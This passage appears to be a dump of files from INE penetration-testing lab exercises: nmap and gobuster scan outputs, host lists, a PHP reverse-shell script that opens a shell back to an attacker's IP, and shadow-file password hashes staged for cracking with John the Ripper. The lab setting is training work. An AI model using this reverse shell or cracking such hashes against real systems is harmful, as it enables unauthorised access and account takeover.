running on it, see https://nmap.org/submit/ ).\nTCP/IP fingerprint:\nOS:SCAN(V=7.91%E=4%D=2/24%OT=22%CT=1%CU=38636%PV=Y%DS=1%DC=D%G=Y%M=005056%T\nOS:M=6036E544%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10B%TI=Z%CI=I%II=I\nOS:%TS=8)OPS(O1=M4E7ST11NW7%O2=M4E7ST11NW7%O3=M4E7NNT11NW7%O4=M4E7ST11NW7%O\nOS:5=M4E7ST11NW7%O6=M4E7ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6\nOS:=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M4E7NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O\nOS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=\nOS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%\nOS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(\nOS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=\nOS:N%T=40%CD=S)\n\nUptime guess: 0.007 days (since Wed Feb 24 18:36:09 2021)\nNetwork Distance: 1 hop\nTCP Sequence Prediction: Difficulty=260 (Good luck!)\nIP ID Sequence Generation: All zeros\nService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel\n\nTRACEROUTE\nHOP RTT ADDRESS\n1 55.71 ms 172.16.64.92\n\nNmap scan report for 172.16.64.166\nHost is up (0.056s latency).\nNot shown: 65533 closed ports\nPORT STATE SERVICE VERSION\n2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n| 2048 a6:1e:f8:c6:eb:32:0a:f6:29:c8:de:86:b7:4c:a0:d7 (RSA)\n| 256 b9:94:56:c7:4d:63:ad:bd:2d:5e:26:43:75:78:07:6f (ECDSA)\n|_ 256 d6:82:45:0a:51:4e:01:2d:6a:be:fa:cf:75:de:46:a0 (ED25519)\n8080/tcp open http Apache httpd 2.4.18 ((Ubuntu))\n| http-methods: \n|_ Supported Methods: OPTIONS GET HEAD POST\n|_http-server-header: Apache/2.4.18 (Ubuntu)\n|_http-title: Ucorpora Demo\nMAC Address: 00:50:56:A0:B1:E8 (VMware)\nNo exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).\nTCP/IP fingerprint:\nOS:SCAN(V=7.91%E=4%D=2/24%OT=2222%CT=1%CU=35822%PV=Y%DS=1%DC=D%G=Y%M=005056\nOS:%TM=6036E544%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10B%TI=Z%CI=I%II\nOS:=I%TS=8)OPS(O1=M4E7ST11NW7%O2=M4E7ST11NW7%O3=M4E7NNT11NW7%O4=M4E7ST11NW7\nOS:%O5=M4E7ST11NW7%O6=M4E7ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%\nOS:W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M4E7NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S\nOS:=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%R\nOS:D=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=\nOS:0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U\nOS:1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DF\nOS:I=N%T=40%CD=S)\n\nUptime guess: 0.004 days (since Wed Feb 24 18:40:21 2021)\nNetwork Distance: 1 hop\nTCP Sequence Prediction: Difficulty=258 (Good luck!)\nIP ID Sequence Generation: All zeros\nService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel\n\nTRACEROUTE\nHOP RTT ADDRESS\n1 56.01 ms 172.16.64.166\n\nRead data files from: /usr/bin/../share/nmap\nOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .\n# Nmap done at Wed Feb 24 18:46:12 2021 -- 4 IP addresses (4 hosts up) scanned in 122.68 seconds\n" }, { "path": "ine-labs/black-box3/alive_hosts.txt", "content": "172.16.37.1\n172.16.37.220\n172.16.37.234\n" }, { "path": "ine-labs/black-box3/dot220/gobuster_scan.txt", "content": "\n=====================================================\nGobuster v2.0.1 OJ Reeves (@TheColonial)\n=====================================================\n[+] Mode : dir\n[+] Url/Domain : http://172.16.37.220/\n[+] Threads : 10\n[+] Wordlist : /usr/share/wordlists/dirb/common.txt\n[+] Status codes : 200,204,301,302,307,403\n[+] Timeout : 10s\n=====================================================\n=====================================================\n/.hta (Status: 403)\n/.htaccess (Status: 403)\n/.htpasswd (Status: 403)\n/index.php (Status: 200)\n/javascript (Status: 301)\n/server-status (Status: 403)\n=====================================================\n=====================================================\n" }, { "path": "ine-labs/black-box3/dot234/for_john.txt", "content": "elsuser:$6$MGsPjrt7$hBUzryEWeYdgKvj4MO0v7y0JJ6TxH1oXw4vHCXzG5kZOv8i4ejvbXUM3jkBuymRet9jfQ53hU806p8ujcuuQr1:17515:0:99999:7:::\ntest:$6$kDmCF0O1$i7.RLl8NmxNCgB2jCGHgmGYV0TcVoaAeTuseohJ5Z71okk/J1N4owqfpuHjmfqAHSxx2MAPezfc8OHy.SRodM1:17983:0:99999:7:::\n" }, { "path": "ine-labs/black-box3/dot234/gobuster_scan.txt", "content": "/.htaccess (Status: 403)\n/.hta (Status: 403)\n/.htpasswd (Status: 403)\n/index.html (Status: 200)\n/server-status (Status: 403)\n/xyz (Status: 301)\n" }, { "path": "ine-labs/black-box3/dot234/index.php", "content": "\";\necho \"
\";\n\nsystem(\"ifconfig\");\n\n?>\n" }, { "path": "ine-labs/black-box3/dot234/revshell.php", "content": " array(\"pipe\", \"r\"), // stdin is a pipe that the child will read from\n 1 => array(\"pipe\", \"w\"), // stdout is a pipe that the child will write to\n 2 => array(\"pipe\", \"w\") // stderr is a pipe that the child will write to\n);\n\n$process = proc_open($shell, $descriptorspec, $pipes);\n\nif (!is_resource($process)) {\n\tprintit(\"ERROR: Can't spawn shell\");\n\texit(1);\n}\n\n// Set everything to non-blocking\n// Reason: Occsionally reads will block, even though stream_select tells us they won't\nstream_set_blocking($pipes[0], 0);\nstream_set_blocking($pipes[1], 0);\nstream_set_blocking($pipes[2], 0);\nstream_set_blocking($sock, 0);\n\nprintit(\"Successfully opened reverse shell to $ip:$port\");\n\nwhile (1) {\n\t// Check for end of TCP connection\n\tif (feof($sock)) {\n\t\tprintit(\"ERROR: Shell connection terminated\");\n\t\tbreak;\n\t}\n\n\t// Check for end of STDOUT\n\tif (feof($pipes[1])) {\n\t\tprintit(\"ERROR: Shell process terminated\");\n\t\tbreak;\n\t}\n\n\t// Wait until a command is end down $sock, or some\n\t// command output is available on STDOUT or STDERR\n\t$read_a = array($sock, $pipes[1], $pipes[2]);\n\t$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);\n\n\t// If we can read from the TCP socket, send\n\t// data to process's STDIN\n\tif (in_array($sock, $read_a)) {\n\t\tif ($debug) printit(\"SOCK READ\");\n\t\t$input = fread($sock, $chunk_size);\n\t\tif ($debug) printit(\"SOCK: $input\");\n\t\tfwrite($pipes[0], $input);\n\t}\n\n\t// If we can read from the process's STDOUT\n\t// send data down tcp connection\n\tif (in_array($pipes[1], $read_a)) {\n\t\tif ($debug) printit(\"STDOUT READ\");\n\t\t$input = fread($pipes[1], $chunk_size);\n\t\tif ($debug) printit(\"STDOUT: $input\");\n\t\tfwrite($sock, $input);\n\t}\n\n\t// If we can read from the process's STDERR\n\t// send data down tcp connection\n\tif (in_array($pipes[2], $read_a)) {\n\t\tif ($debug) printit(\"STDERR READ\");\n\t\t$input = fread($pipes[2], $chunk_size);\n\t\tif ($debug) printit(\"STDERR: $input\");\n\t\tfwrite($sock, $input);\n\t}\n}\n\nfclose($sock);\nfclose($pipes[0]);\nfclose($pipes[1]);\nfclose($pipes[2]);\nproc_close($process);\n\n// Like print, but does nothing if we've daemonised ourself\n// (I can't figure out how to redirect STDOUT like a proper daemon)\nfunction printit ($string) {\n\tif (!$daemon) {\n\t\tprint \"$string\\n\";\n\t}\n}\n\n?> \n\n\n\n" }, { "path": "ine-labs/black-box3/dot234/scan_xyz.txt", "content": "/.hta (Status: 403)\n/.htaccess (Status: 403)\n/.htpasswd (Status: 403)\n/index.php (Status: 200)\n" }, { "path": "ine-labs/black-box3/thorough_nmap_scan.txt", "content": "# Nmap 7.91 scan initiated Thu Feb 25 20:05:44 2021 as: nmap -sV -n -T4 -Pn -p- -A -iL alive_hosts.txt -v --open -oN thorough_nmap_scan.txt\nNmap scan report for 172.16.37.220\nHost is up (0.057s latency).\nNot shown: 59238 closed ports, 6295 filtered ports\nSome closed ports may be reported as filtered due to --defeat-rst-ratelimit\nPORT STATE SERVICE VERSION\n80/tcp open http Apache httpd 2.4.18 ((Ubuntu))\n| http-methods: \n|_ Supported Methods: GET HEAD POST OPTIONS\n|_http-server-header: Apache/2.4.18 (Ubuntu)\n|_http-title: Site doesn't have a title (text/html; charset=UTF-8).\n3307/tcp open tcpwrapped\nNo exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).\nTCP/IP fingerprint:\nOS:SCAN(V=7.91%E=4%D=2/25%OT=80%CT=1%CU=44103%PV=Y%DS=2%DC=T%G=Y%TM=603849E\nOS:2%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=2%ISR=109%TI=Z%II=I%TS=8)OPS(O1=M\nOS:4E7ST11NW7%O2=M4E7ST11NW7%O3=M4E7NNT11NW7%O4=M4E7ST11NW7%O5=M4E7ST11NW7%\nOS:O6=M4E7ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y%\nOS:DF=Y%T=40%W=7210%O=M4E7NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=\nOS:0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)\nOS:T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%\nOS:RUD=G)IE(R=Y%DFI=N%T=40%CD=S)\n\nUptime guess: 0.002 days (since Thu Feb 25 20:05:06 2021)\nNetwork Distance: 2 hops\nTCP Sequence Prediction: Difficulty=257 (Good luck!)\nIP ID Sequence Generation: All zeros\n\nTRACEROUTE (using port 80/tcp)\nHOP RTT ADDRESS\n1 61.21 ms 10.13.37.1\n2 57.49 ms 172.16.37.220\n\nNmap scan report for 172.16.37.234\nHost is up (0.061s latency).\nNot shown: 57710 closed ports, 7823 filtered ports\nSome closed ports may be reported as filtered due to --defeat-rst-ratelimit\nPORT STATE SERVICE VERSION\n40121/tcp open ftp ProFTPD 1.3.0a\n40180/tcp open http Apache httpd 2.4.18 ((Ubuntu))\n| http-methods: \n|_ Supported Methods: GET HEAD POST OPTIONS\n|_http-server-header: Apache/2.4.18 (Ubuntu)\n|_http-title: Apache2 Ubuntu Default Page: It works\nNo exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).\nTCP/IP fingerprint:\nOS:SCAN(V=7.91%E=4%D=2/25%OT=40121%CT=1%CU=36035%PV=Y%DS=2%DC=T%G=Y%TM=6038\nOS:49E2%P=x86_64-pc-linux-gnu)SEQ(SP=FF%GCD=1%ISR=10F%TI=Z%II=I%TS=8)OPS(O1\nOS:=M4E7ST11NW7%O2=M4E7ST11NW7%O3=M4E7NNT11NW7%O4=M4E7ST11NW7%O5=M4E7ST11NW\nOS:7%O6=M4E7ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=\nOS:Y%DF=Y%T=40%W=7210%O=M4E7NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%R\nOS:D=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q\nOS:=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=\nOS:G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)\n\nUptime guess: 0.002 days (since Thu Feb 25 20:05:06 2021)\nNetwork Distance: 2 hops\nTCP Sequence Prediction: Difficulty=255 (Good luck!)\nIP ID Sequence Generation: All zeros\nService Info: OS: Unix\n\nTRACEROUTE (using port 40121/tcp)\nHOP RTT ADDRESS\n- Hop 1 is the same as for 172.16.37.220\n2 58.71 ms 172.16.37.234\n\nRead data files from: /usr/bin/../share/nmap\nOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .\n# Nmap done at Thu Feb 25 20:07:46 2021 -- 3 IP addresses (3 hosts up) scanned in 122.12 seconds\n" }, { "path": "ine-labs/bruteforce-and-password-cracking/alive_hosts.txt", "content": "192.168.99.22\n192.168.99.100\n" }, { "path": "ine-labs/bruteforce-and-password-cracking/for_john.txt", "content": "root:$6$NMfSi/bG$y9j8uMu4glpLudMRvzznUZ5h30jlobtAJGZYRaa64pdKy3i1WLTnmPPWUxfPdZwJKReFPU/zBo8HRpD.RAkrG1:0:0:root:/root:/bin/bash\ndaemon:*:1:1:daemon:/usr/sbin:/bin/sh\nbin:*:2:2:bin:/bin:/bin/sh\nsys:*:3:3:sys:/dev:/bin/sh\nsync:*:4:65534:sync:/bin:/bin/sync\ngames:*:5:60:games:/usr/games:/bin/sh\nman:*:6:12:man:/var/cache/man:/bin/sh\nlp:*:7:7:lp:/var/spool/lpd:/bin/sh\nmail:$6$jLhDRY5M$MJPM2mmM1khh8l0taxORP7oNn4jmwHAOLWZij5DacV25Hzj1ryykobxGlprlgaCXg/PGV2Po34JF4HgPv8roQ.:8:8:mail:/var/mail:/bin/sh\nnews:$6$7pnXYnUf$F7t6t4A6rQf2z/ycnPuEdzMH9RGB5W0OFL420eKvp/s/SK3KaD6EM/gDNzhL9YFCthi7JVavBa8/nJCxX3XZW0:9:9:news:/var/spool/news:/bin/sh\nuucp:*:10:10:uucp:/var/spool/uucp:/bin/sh\nproxy:*:13:13:proxy:/bin:/bin/sh\nwww-data:*:33:33:www-data:/var/www:/bin/sh\nbackup:*:34:34:backup:/var/backups:/bin/sh\nlist:*:38:38:Mailing List Manager:/var/list:/bin/sh\nirc:*:39:39:ircd:/var/run/ircd:/bin/sh\ngnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh\nnobody:$6$KRss6ftU$c/nB9QsK0iZ0zj8o6VmArcgiuGZ4oOjlLeCDYioV/rrcYYtuE/xkvhdDYvRtlydkFjvlqOXdKDV/0o6fA32Qt.:65534:65534:nobody:/nonexistent:/bin/sh\nlibuuid:!:100:101::/var/lib/libuuid:/bin/sh\nsshd:*:101:65534::/var/run/sshd:/usr/sbin/nologin\nmysql:!:102:104:MySQL Server,,,:/nonexistent:/bin/false\ntelnetd:*:103:106::/nonexistent:/bin/false\nsysadmin:$6$Sje/FZov$s6OBgDRso6O25TAo/K62bmuUjGI7po0yaa5y7n4agBKIFywDyleLs2FFNlXJiAgROHN4VD/WkfEFYIXcH9QPW1:1000:1000::/home/sysadmin:/bin/sh\ninfo:$6$b7FyMcC/$Xq.S9rAti5XfKvNR8DK2U0hCusjKeqNBGxrm0W9OvfA29gg68kKRkTyut6rLIf0ib4rLilPg6uiSqCUOuoYFU.:1001:1001::/home/info:/bin/sh\nsupport:$6$5UCqb4PI$080lZhjRESgv4pvv3eYze/PQFkEzIe//QBAgX4383cxPfX4B7hwsPP5d.vEOp49Nep015ISQCkD1SV.b.CeV0.:1002:1002::/home/support:/bin/sh\nabuse:$6$wew6XAFC$bRWpMBzLUx9vps5kW8zBJlHh7y7TodfdNfClkmlTEIcs31q9TQR1nPnGYp4GO4fpcOTs/H8Ui62lFoywXMjSs.:1003:1003::/home/abuse:/bin/sh\nadmin:$6$u145Czfw$8UNRyCdVRM5BpO6wMZBOhJJA4tXLexxwQJhGLbJbD0FUOBWg.V/ybl6BNQVr4er3Gghg8gymvUqu1fMWqLs3V.:1004:1004::/home/admin:/bin/sh\npostmaster:$6$TNSdQqc8$Pij0H4TXEH6.i2tpomznu0uY9UFss/wG6xs1qsYQQSJ0YZNB/dBDkmq9I3O1regCsFgS9r7jSGq0GG7eIcqtK1:1005:1005::/home/postmaster:/bin/sh\nchris:$6$ZAY5sjcZ$htURsPqIyO4tpNUq12v2GDgAXe4oGVLYPQHDpVn7TMgLm8MP7g5hpZo5NitjHQfqvzB0dptX.fR0ciN6kkWeA/:1006:1006::/home/chris:/bin/sh\nwebmaster:$6$KLM4wfkU$ZYsO.eQu2qXMfpQaSLzjgJn0dBfyiPRrb4xKT8cUWbaVI.psHzgPuWpkXiwKKWrqfSVCceQBuDVwFNQwH6qWS1:1007:1007::/home/webmaster:/bin/sh\nmike:$6$HZRL7RJz$PanyrCDQAvupUzoQ/SjtY1pp4DHQE4p7sVfvh6oZNbAlgUQBIf9R6TMW3wNV4976ngBUhp.39ZKbPwMYf2vsU1:1008:1008::/home/mike:/bin/sh\nsteve:$6$gDpnLZEp$fd9Cptcb9W2lIYMIP/YTgmT4t2syNr99LWNmdemNdhKOpAQ3KnHMR6/BRtwyKJw2ASYWlM612anHKhT7DEua31:1009:1009::/home/steve:/bin/sh\ndave:$6$ye9cmjcs$WwHt5jEfmA3ONfKpD8YjLu2bReTpNoDByFdvfYCHD81609nrgkXEq8iV12LundO8a5oUW9h3HN4m0GYLKHM4W.:1010:1010::/home/dave:/bin/sh\npaul:$6$dJKby9gL$YOeP.Ct6VQjxDDptfdvsTjgZEuvoIzhKua8lbn9G/BAQZ5zxNMSaeTAvQYF4Tk3MR6VVmAKrEx86LC2pXmJ4o/:1011:1011::/home/paul:/bin/sh\npeter:$6$vMrS1QqI$rY7HpdXf1T2YRXcryJf7ubn98vsPD5aNduivE3biK.ExHmO1bjhn3UlW4wX2B9PPUTiNY49N88jZGKXUr/Yu3.:1012:1012::/home/peter:/bin/sh\nmatt:$6$WPIf46Nd$/xQQomUKt1rkbWVDMfqJsvPQStDthciv8OwXgPQyTos8Yz3YTlP8WTwWPKyWauiYP6/EiBtAW3LhaBXo3LTXQ.:1013:1013::/home/matt:/bin/sh\njobs:$6$fVNXa4IX$9CCRbwgJpfmQTUCTEBb9tqI0ze1vkSbMUUOusWxnH709pyzTCWdRTBtzViTuECSJBwxZhDwwjZdl7f7rtiAYg.:1014:1014::/home/jobs:/bin/sh\njoe:$6$xD.dth1G$g5u/t/SnuBZCprxXo9CogU5AXcaEtWglhu0nzxZzJTimkobFgI97xCR0p66REWXfWDZ.z95SeWoGPswT0j8wU1:1015:1015::/home/joe:/bin/sh\nuser:$6$nytxqfYV$.ysNgYy5wAqynOjSAt8j7wKqDVwMjhhMI/5NQZohVKtwtZjtoSHSgxhT3MkGUvP5O0INCRZihD34Dz0wB2KCQ/:1016:1016::/home/user:/bin/sh\neric:$6$VuEU0lI9$VCX/Tg6mxXY7wHHoCGQmw8syH39n6wrmUVgChfTd6I0Yt7Un7SFukxR0hhC2NHl6T7Fumr8hVwvML5DMF.Ua./:1017:1017::/home/eric:/bin/sh\ndan:$6$zVKkCXse$o07lxPMPnWaHQfbj6s/D23pJNzhLsKi1WGGlsVifSIXdYdQ0pCbl0Rjn/JV83HI4f0lDjBGWLv92gSeBdqCzZ/:1018:1018::/home/dan:/bin/sh\nbrian:$6$o1kRvK4f$6kx2GgKATEjqgF/Ne5H3EEGBUMz/2zZwVv3kTCr7wnxqN7eKkkBATmz9Ye3C6QW/MQRW.9F6MHSGvJKnA4uFG1:1019:1019::/home/brian:/bin/sh\nmichael:$6$1yCWFuPq$OiVnd4GHG/8bMLzLyWVpV47WAf7r9LYzTfGLSKI02.Ubq8YK/QsSi7EuXRM7cPC5IH9HpSkYWJQBbOUZQQHYt.:1020:1020::/home/michael:/bin/sh\nsales:$6$PsA1.Gfk$zowvm.gcO7raMNmAJ8fDLjKybTUanVmVNld/k5S7gMrwq43Q1jO2MQ/dGhNQTsCNrC2.Vwjt3/D3JKKNHJbX/.:1021:1021::/home/sales:/bin/sh\nnanog:$6$FDvdWcSH$F9T5azU4LovIyNB7wX0htrH74TJ46iHmn3QjI8lgQEKVQDeQ6Kd1skimbuTbE7.L7bl9xO7j/GpdiQp2m4c9d.:1022:1022::/home/nanog:/bin/sh\njeff:$6$6hWz2ZU6$xcj.w/GvzUWwqmpE5CVAX8pWrW/92yi/13BKzu31oH80P7KJ2kKr8rpRgMkjuIO3GjHdGg1qmYxkvNcwubsMC/:1023:1023::/home/jeff:/bin/sh\nalex:$6$JyMZO.bE$h0b.97PuMtRnim8GRTiWbqxNIvLeiQ12dBTDyufyaClGhIRHnSaNQVdqFMSDY5f.qpGrk0rTxHQ8Ba8zMdk5I.:1024:1024::/home/alex:/bin/sh\nscott:$6$LawsHaww$YJJd3lCsV45nty1gHPUp2PIwC9ezfZ8R7s4X4cq16XeiNg34aD.ydJZxG09Gfbv4HhH.BUeCDe.Zg4KDxvccV/:1025:1025::/home/scott:/bin/sh\njason:$6$fvuvc5Jr$Rtbo0pfPs4sgCreQSOKdOy2Xes8ZpGaWpRzau/zT0Fe2PfY895x9FGZUT9OlTJvRH73wuLI1DzkqVq46M8MCo.:1026:1026::/home/jason:/bin/sh\nbob:$6$O9g8kRFd$n4qyO7Pn0e0q8.JPhoszE9CT06lheE4PcMaHhB.VXQeWlsAKWoSHaOlI8QDBb0Tx9wKuuyTKsbTE7w6Znw2Uy/:1027:1027::/home/bob:/bin/sh\njim:$6$RoQAB6qb$J6ku0OnN9AW/rlGDogQC0a8mHlM5SEpLJTvpRRYr1ozJ.1tpa14MW/txPzxJM0aDehqIskDrPgeu2GNAQriVx1:1028:1028::/home/jim:/bin/sh\nadam:$6$SMfCr27F$ZsSxV5bja0friZIyeaVwKhOta1Kde4X8Lk6HrqCWPA1Nm7TpvsoLZh1qHz/tPJSp6l/LzDIn7lOkGBC4HuD6E.:1029:1029::/home/adam:/bin/sh\njames:$6$qEJW3BIW$c8Zo6o0MABzuSLQu5Db6wFZAkNliAVC/VM4NHVu5Sd2mUb.xBIUbuvQLWbbXf6KPgtNhuzPdGrey45LtRYVSP1:1030:1030::/home/james:/bin/sh\ntim:$6$JXamlohb$Az7LB/X.bm7J4QU//XHE9W.OGZ87wi2RVRHAWrSYxX75lrZn7vkwSGxBp/pZEZLGUJhnzE86lkIb.VPkst2Ql/:1031:1031::/home/tim:/bin/sh\nmajordomo:$6$NPJJ2uUo$ct2R6b.jg.WK4dAw2wzdDgxsuHg5LUpdvz9owz.CgAb6L5o/IKsOZj6rbmaWyolhanoOxKrdsmn4.Bysh0hGo/:1032:1032::/home/majordomo:/bin/sh\ndaniel:$6$8mksQQtb$xXcaS/KPANmdotnWrHa26J4KUaQHBQSxy5FvniWecSyIpvZtZrm9ZMCG/x0WKXzo0NOHwS6yoKYUoRwB4BDwh1:1033:1033::/home/daniel:/bin/sh\nben:$6$2iH7dNAN$zgpUqA9ZXBRRDkJuv1TrAulRGQplR5t98Gx9js77s6quNEtU/hXZLHKryYZtDZO8MJjO.ZUzs8k9QpKrRBGX51:1034:1034::/home/ben:/bin/sh\nhostmaster:$6$V5c3cv9Q$S0JMkvGW7qokXYf0lEGAw8kY29s1VKKcSz16N2fvbJHML5BZR6vZofyTGUMNGVJ1k.RNjHYdmOqdId0Ep0wO61:1035:1035::/home/hostmaster:/bin/sh\ntom:$6$JWml6IwT$UbW187dhuYbtw983jO9EqT/m6qYzT/Ovvw9lcIpBsL./g7r6SJTDFsupsnNoavyfQ3FE2tq0tr4byVdsvxxu40:1036:1036::/home/tom:/bin/sh\nsnort:$6$O/joFTvS$zFDDPUYVY3qQq45i6FgZRFx9dQdTTkWoIKE2IsoBw5FrzZGoKiLS82FcMCCr0bouOD0cX/hYswDjKD7UNN4v/1:1037:1037::/home/snort:/bin/sh\nandy:$6$vvz6/jIM$KpRwLWVb.JQZd9A/gAgmV/jdyXUr0FzU4CwOpzxVI7/7qd9pt6AFdSSMokJWL.WC7w0yFuITvyoE7iSyy4Ed6/:1038:1038::/home/andy:/bin/sh\nandrew:$6$xrxK.ZMk$SbnalSKc8SRQUuZadGTGhClUF18xjC4HTWOPlcT2D5wgRkd.ou5zLE7dyM/bBI0M9vc6WYQjQJ7Teotmc3dJN/:1039:1039::/home/andrew:/bin/sh\ngreg:$6$M6b5jpj3$1toGupgM1bdko05fLUrnUdDwwdB2nbK3pvpgpA.cK6dI8ZyBW0PnHX29mwK6qV4gGUZaGZGpUHCUZHQPXTW87.:1040:1040::/home/greg:/bin/sh\nrobert:$6$yfsl9IAe$5ZtjNOyf7uuOo4a.Q7G.96z67KB9BHI.9ri7zeqS6HFk4RjtePvXGdD5iZCK4EJUBsyjy8KYe0NsSEz4S1jZK0:1041:1041::/home/robert:/bin/sh\nmartin:$6$UMJrcI1d$ljAGjf2Ysu6WZj6OonyBqdWgC1JGBrg/cSkwA8P0AYuFUi2Nj3V8jTz77HSBCgNdBmi8Z0DpU40lkpJoKCVYi1:1042:1042::/home/martin:/bin/sh\nrob:$6$KynzgNNI$CRqz5ZCoxyw8Iz3Y4DavYHefo8e3CdPxaJAKmA8G7fVioFb3imRVsOQO9fvR94aOSywrCHx8JRZ8rox4jqVCk.:1043:1043::/home/rob:/bin/sh\nstefan:$6$5UNbMPFr$S9zKaPdjN3WF5XdvcBZrc1RV.bk/ufmZgiNAr8OsnKtZCPqFRtQ.g2ewAbQ40ARubCMQD0fIdQSL3LB4JBBuK1:1044:1044::/home/stefan:/bin/sh\nsam:$6$4IQ98NuP$Q7Kd1uQhbVl4rv9yPzn51rA8U1stcC9zCUu/o83v959HNcMXdEyZ39Ec8/cTq89v/fes.lwpozekSK16JHLr3/:1045:1045::/home/sam:/bin/sh\nlinux-kernel:$6$iZd1ERbp$wO5U7YmvpfM8vuJX2er3jI7JPUTv7ahoypgc2n1/CWQr9yyf7CyFcxUBj9T2tEx7KR9x3Z6/C5Q3wxumJKMuu/:1046:1046::/home/linux-kernel:/bin/sh\njonathan:$6$JN51qUeO$YRkPN8gR43gmtTEg0uycZaz3SOOwT37g17tt8bB/Fi/Xr/dKPsUhaWfOjZ1uNrJg7sL4z9srGe.zWP0B1tfQc/:1047:1047::/home/jonathan:/bin/sh\nerik:$6$Ib9a2n66$vfEKmQ0LO/sV3M4PsanGWx3ATuHNFZ/FysOYhKAdG4PdXeXiLackGxLuNs7qG4KOAVVhyLAM.99pP4j8sJ3Vr1:1048:1048::/home/erik:/bin/sh\norion:$6$EnZP3LwQ$pDR2Jny9KIPDEmoB.jzhp38Ik5FyG4DWzewHoEePxdCBzFfBWnIUQNXDNup8U2IoAiUC/jaO/i9SpStI8ZgIa1:1049:1049::/home/orion:/bin/sh\ndoug:$6$kV2vj2S6$eKQyp76DlZbo/tgLKyjtLQf.G86BY9oVkfscbIrWwCYRqd.zJnLIOJPrGJJSvK59O.OpUc5L8vo.1yet/IndA.:1050:1050::/home/doug:/bin/sh\nspam:$6$b4.yukui$byGJM8hTw11KmLes6YSfvo7IKfkg5HYtll.JOVFJgM9IObO6NE7dpLhTiHxgLLCPtXa0wbwxPAlYTtPsrCnLP.:1051:1051::/home/spam:/bin/sh\nnessus:$6$5b.qaMaF$MSnDGsA6Yo7LzABXWXtdHb5HruaehdkrLbdv9Yg.lQoG9nC6patjwPqFuR1G2CSslqIZkBbZst7rhCeJXr3Z.0:1052:1052::/home/nessus:/bin/sh\nbugs:$6$cJfe9yB0$DkgkyIHYGOFQ9hIF6A28Da0niQBq6Yn9PXjNKAJEK7y0sdEc6v9KSpW8DEBXg.lO/MCgpHuuAbbcAQfYs36gG/:1053:1053::/home/bugs:/bin/sh\nrick:$6$SFXj7ADA$qu3mlQDjIwVNzC.3JkUKUS2Hp7aeC1Zg5GP1h7nM5BmCTsJ7d1ckSF3ErjPbpZFIqNCz6NAgy1F76PmjeJz.x0:1054:1054::/home/rick:/bin/sh\njosh:$6$KU1UUsAZ$ac7T8xBfcLxXmb/qRNuEKrfZy1G/kcqsJzWJ93/qTa08itf31x5/pcdVHj30MKXYh/poaN8fOlKkZR0f2xrr3.:1055:1055::/home/josh:/bin/sh\nresearch:$6$m0nQbAaZ$FKL3XBWkT3GEv0UVn6WTHssjyjou2/33f8BKE4voI7HWU9FdF1hABlyQAqAYhJOfRuQpuZzSBcJVvCMtMX6D51:1056:1056::/home/research:/bin/sh\ncraig:$6$movXAzDc$E4sBocqFLzY9iif37.1VF4uuOr5QsI7ZwrnkTM.ITDebTuEc5od/87suR9fBPGuEm4HU4pUf324z3Pxb86Sk9/:1057:1057::/home/craig:/bin/sh\nsven:$6$L2Ac90qT$4NWVht13koXx1Zewnoq.aqh7584NpDNToIa41Qqbc94hwitYtA5pXZF0ZwsKRUIQ4bf0Z.5Tm9Ue5BLbw1y/61:1058:1058::/home/sven:/bin/sh\ngary:$6$mbC5nX5S$baJcUKoownjBSnz6/wuXNK75gvtKZ5dub4B